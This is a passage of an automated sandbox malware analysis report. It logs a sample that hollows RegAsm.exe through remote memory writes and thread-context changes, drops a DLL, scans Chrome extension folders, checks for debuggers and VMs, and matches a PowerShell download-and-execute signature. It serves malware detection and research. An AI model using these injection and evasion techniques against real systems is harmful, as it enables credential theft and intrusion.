                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA5319A push esi; ret 2_2_1FA5319C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA53125 push esp; ret 2_2_1FA53126
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA53164 push ebp; ret 2_2_1FA53167
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA53160 push ebp; ret 2_2_1FA53161
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA5317D push ebp; ret 2_2_1FA5317E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA530E8 push ebp; ret 2_2_1FA530E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA530F2 push ebp; ret 2_2_1FA530F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA530C7 push ebp; ret 2_2_1FA530C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA530CD push ebp; ret 2_2_1FA530CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B050 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0041B050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dllJump to dropped file
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C7D43A FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00C7D43A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409FC0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409FC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401443 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E016 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C039 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040C039
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004164C7 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004164C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BC98 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BC98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416D7D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00416D7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040D690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C6B5 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040C6B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004177D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_004177D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041738D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_0041738D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004169EC GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,2_2_004169EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411F21 GetSystemInfo,wsprintfA,2_2_00411F21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareb
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2K
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-81118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_0086018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,LdrInitializeThunk,LdrInitializeThunk,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,LdrInitializeThunk,LdrInitializeThunk,Wow64SetThreadContext,LdrInitializeThunk,LdrInitializeThunk,ResumeThread,ResumeThread,0_2_0086018D
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C6D883 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C6D883
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B050 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0041B050
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C790B2 mov eax, dword ptr fs:[00000030h]0_2_00C790B2
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C790F6 mov eax, dword ptr fs:[00000030h]0_2_00C790F6
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C7447C mov ecx, dword ptr fs:[00000030h]0_2_00C7447C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041ACF3 mov eax, dword ptr fs:[00000030h]2_2_0041ACF3
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C80AD2 GetProcessHeap,0_2_00C80AD2
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C6D883 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C6D883
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C6993A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C6993A
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C69A96 SetUnhandledExceptionFilter,0_2_00C69A96
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C69BC7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C69BC7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00421C0B memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00421C0B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00423DCD SetUnhandledExceptionFilter,2_2_00423DCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042224F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0042224F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA242AF SetUnhandledExceptionFilter,2_2_1FA242AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA22C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1FA22C8E

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: 56bDgH9sMQ.exe PID: 7736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7768, type: MEMORYSTR
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_0086018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,LdrInitializeThunk,LdrInitializeThunk,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,LdrInitializeThunk,LdrInitializeThunk,Wow64SetThreadContext,LdrInitializeThunk,LdrInitializeThunk,ResumeThread,ResumeThread,0_2_0086018D
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Searches for specific processes (likely to inject)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004138BA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,2_2_004138BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004137BD CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004137BD
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 425000Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 643000Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8E5008Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C6962C cpuid 0_2_00C6962C
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: EnumSystemLocalesW,0_2_00C7888C
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00C80870
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: EnumSystemLocalesW,0_2_00C801F9
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: EnumSystemLocalesW,0_2_00C801AE
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,0_2_00C80107
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: EnumSystemLocalesW,0_2_00C80294
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00C8031F
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,0_2_00C78DF2
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,0_2_00C80572
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00C8069B
